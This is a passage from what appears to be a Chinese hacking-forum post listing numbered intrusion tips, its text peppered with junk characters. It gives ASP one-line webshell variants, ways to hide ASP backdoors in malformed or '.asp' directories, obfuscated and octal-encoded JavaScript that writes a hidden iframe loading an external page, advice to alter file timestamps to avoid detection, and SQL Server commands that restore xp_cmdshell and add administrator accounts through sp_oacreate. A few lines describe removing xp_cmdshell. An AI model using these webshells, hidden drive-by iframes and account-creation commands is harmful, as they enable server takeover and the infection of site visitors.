c).%><%execute request("go")%><%
* |4 y$ z) `2 \/ s: Ud).<script language=VBScript runat=server>execute request("sb")</Script>
$ R2 Y9 X$ W# t& j* ~e).<%25Execute(request("l"))%25>. J- P6 ^& s* _0 u4 ]
f).<%if request("cmd")<>"" then execute request("pass")%>
; j7 g+ J+ m6 W. T- C( M
5 G" y: G' r+ v0 G. L: G$ T52、at "12:17" /interactive cmd
4 e/ z. L5 `0 u/ E执行后可以用AT命令查看新加的任务
5 b3 P& r# `' e- m2 T  I用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。& b$ x( v0 n( X- V' m/ i/ E# S. o

" m7 e; \. J. H2 C' \53、隐藏ASP后门的两种方法8 \6 j" }9 l6 P. D0 U- o
1、建立非标准目录:mkdir images..\
# j$ S( x4 {0 r% l6 t: d8 i7 u) e拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
7 X0 {& I* J- \5 O; J+ m% Y8 Z通过web访问ASP木马:http://ip/images../news.asp?action=login( v! g% n( W6 a  E7 Q6 k
如何删除非标准目录:rmdir images..\ /s( k( q# Z' A/ ~) \* p6 N5 F: ]- ^
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:9 @2 z5 V: E* Y" G
mkdir programme.asp  y4 [) W3 p( }; R) q0 M5 g  w
新建1.txt文件内容:<!--#include file=”12.jpg”-->, A* Q; |6 _& s" q! r
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件! S" q9 h( G$ E1 U9 P
attrib +H +S programme.asp
3 i' @, }$ r; }" T  w通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt7 t, v7 Z% b* z# t. x, K
4 G5 P" k" [$ y2 m* O! g
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。3 r1 f# T" |% K% K$ Z
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
. c* _9 f& d# n; ?- O# v5 _5 P4 R" K/ U' C/ w8 s9 K
55、JS隐蔽挂马
# |" j3 |7 l1 @4 I( J7 `1.* i1 T# o, p) `  V
var tr4c3="<iframe src=ht";
2 |* q8 A9 I5 u' l) vtr4c3 = tr4c3+"tp:/";- U% \+ s4 Q7 u
tr4c3 = tr4c3+"/ww";
3 t5 N8 m+ u0 K' w7 ]' Ntr4c3 = tr4c3+"w.tr4";5 a5 d% Z, K9 @$ n
tr4c3 = tr4c3+"c3.com/inc/m";2 ]; I& b7 ~) u
tr4c3 = tr4c3+"m.htm style="display:none"></i";+ H- q7 n# i% c
tr4c3 =tr4c3+"frame>'";
( a$ G! x. v1 k% E  y" }document.write(tr4c3);( t1 z9 p; R. n& }% A
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
0 R7 n: i6 P9 @: ^
1 Z% V4 \4 M- d( x( t+ ~. F2.
, J: y  _9 K) b& _5 u2 u7 Y转换进制,然后用EVAL执行。如1 A/ A" ^, J4 m' L+ u# E: B4 u/ d
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
5 J9 h- r" o# c- N9 K0 n不过这个有点显眼。4 X/ U6 N8 H, Z  P& F
3.7 ~- z. M/ K% }9 x
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
# U2 P2 V+ T8 @: D$ A最后一点,别忘了把文件的时间也修改下。
4 T) S! C4 P( L4 o. d" [7 H( c* n% f1 j
56.3389终端入侵常用DOS命令$ m, X: ~6 Y- [4 X& t6 z
taskkill taskkill /PID 1248 /t
* \9 S: Z0 z% Z# y
' y' T/ u8 n) K( f7 [9 u4 Mtasklist 查进程6 c6 ~) }0 X4 P7 n6 Q4 v# U
4 ^- i% o) d% n3 X' o
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限; b$ f4 a$ \$ |" }- I* C( b
iisreset /reboot8 |8 f* |, W  w8 _8 s( i) }1 S
tsshutdn /reboot /delay:1    重起服务器
/ S8 \) e% H. ^2 Z0 s  j$ p& {2 g4 P
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
& a8 w) U3 q* A3 w( c# D) l& E5 G  P+ h) X% S( z2 P
query user 查看当前终端用户在线情况
/ o7 d8 E/ c9 O5 e; c! z
4 w, p  z2 d) l6 c  \要显示有关所有会话使用的进程的信息,请键入:query process *
9 ^) F$ e+ O1 n! W4 ~
9 ?8 B/ o2 M/ K要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2* b, I9 p5 |# y9 ~$ z
7 s% N+ A! o- l9 u. A
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
- ^% `; t& Y/ f" w; @
. u* w6 S- M3 Y* s9 G要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM020 G3 B& K; }& b& d5 x

$ `5 ~4 r6 _. A命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
; t7 R- l1 K% z& k5 K) S. `8 f1 P  H* y! k
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
) u; A# Y1 {" c# P8 e* _8 T  [
9 m# e' \* G/ m0 v1 G命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。6 Y6 c4 B* s! p# t7 |+ d# k2 E% Y
; a+ o+ u, _; U. F
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
6 @6 i/ u0 o) ~7 x# `
) }* W/ b* ~$ W6 C: u3 ^56、在地址栏或按Ctrl+O,输入:& J# j$ s; W+ n" M! u3 t
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;* x6 ]# d- g9 f2 ]
% D4 ?$ ^  C$ W# Q: w/ o6 C
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
3 P  u$ d0 E( I* N  d- y' F! E$ O1 w, V1 z
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,$ `9 E! S: A2 E
用net localgroup administrators是可以看到管理组下,加了$的用户的。' [7 T: ^6 P4 D1 s
' c6 o/ y! d9 x
58、 sa弱口令相关命令+ a+ G7 K; o9 J* D! S$ j% S( _

6 `& q: G/ }( {! ]' b( H# e; L8 V一.更改sa口令方法:- l% M' m( n7 E# w& I
用sql综合利用工具连接后,执行命令:; _$ T7 @& `- e+ l/ `& i
exec sp_password NULL,'20001001','sa'
8 l5 J2 `# T6 H) `(提示:慎用!); h* @3 V1 \4 F+ }

/ ?1 d3 M4 c% U' r二.简单修补sa弱口令.! z5 N. \) U# c. o

* f" `% i- u$ q方法1:查询分离器连接后执行:1 q' o6 u* w7 c0 s2 _
if exists (select * from
! F. b6 V. F) W5 J9 Z1 Idbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
9 T) c. V. x4 bOBJECTPROPERTY(id, N'IsExtendedProc') = 1)" |2 u1 b6 U# D7 U' v) t
: G: x, j0 `6 c% Z0 v# @( c
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
6 g1 a1 t" z8 e. `$ k
" `" W3 z) E) V/ K$ e. cGO
9 ], g: H# _0 S) p) L! {$ ]  v! k1 x- }
然后按F5键命令执行完毕6 i! D* F- `* k" E0 X

! S2 m, ^* W- W6 z方法2:查询分离器连接后
$ @% Q+ |% J8 a第一步执行:use master% K4 s& y7 r. C; A( W
第二步执行:sp_dropextendedproc 'xp_cmdshell'
9 j. ^$ t! {& D3 p6 D2 L3 L1 C. u, @然后按F5键命令执行完毕
+ i/ v$ j. I9 ]' l
8 t: h, I. P& I9 B  ]; F
! e  ?2 ^3 r6 [4 h! |- L三.常见情况恢复执行xp_cmdshell." v) Q- b  h# n. J9 s2 n

; l( `# V. N! k2 f, j7 J% ^% Z0 Q0 J* D# q$ [) w/ }
1 未能找到存储过程'master..xpcmdshell'.4 W8 I# R& X( P2 C* r% m
   恢复方法:查询分离器连接后,$ g# B; v- `: R, b- V" p: X
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int6 K. ^% l  q6 I' ~
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'4 t; |, P4 y7 j: i/ B0 A
然后按F5键命令执行完毕' Z4 m& e; l4 G
, O% x. A, b; Z
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)! `& ~+ l0 ?$ l+ I1 \) f/ {
恢复方法:查询分离器连接后,- `# u; y; [' m8 r7 `3 U
第一步执行:sp_dropextendedproc "xp_cmdshell"
: f$ A* D' c: U. W4 D+ _2 M9 G  k第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll') `" F1 j! b( r, _- V+ }& @! t$ j
然后按F5键命令执行完毕
/ z! v  j' K9 p! w. Z* X+ p: N1 D9 b5 S! [) }' S' b
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
% |* S- a& K$ n/ c5 j. T% S恢复方法:查询分离器连接后,
2 Z- d4 J$ Q, p2 B7 }4 U: M第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
0 n% n2 B; M( v. `' r第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
; A+ I, u) e, N2 {4 n# o" X5 w然后按F5键命令执行完毕! R2 @5 {5 r* w" {& {! p7 X

: H: A. Q8 C/ l* ?( f: h1 T四.终极方法.' V, [, K; y+ J
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:7 i- y1 v$ d/ _- U. D3 n5 `6 H7 ~
查询分离器连接后,
+ Q2 C* X. {3 O; |  f, @3 S2000servser系统:
& f5 o) |& }5 y% O, n  n5 gdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'! k0 y) Z: m: t( r& T7 r8 o+ z

1 O: u" ?3 r' G9 j8 E! ydeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'# W5 d* l4 f; T6 Y3 y
7 m0 h  Q$ k. k/ p; l0 a
xp或2003server系统:/ Q9 I: Y9 g% {: F+ g! Y+ ]& X
3 a. @+ C# s1 o" q
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
5 G: a5 e3 v) [, D8 c+ X- V# b& V2 r: n- y; p0 W
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
; ?+ m+ F' |' m- X" x% z+ ^- q8 |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表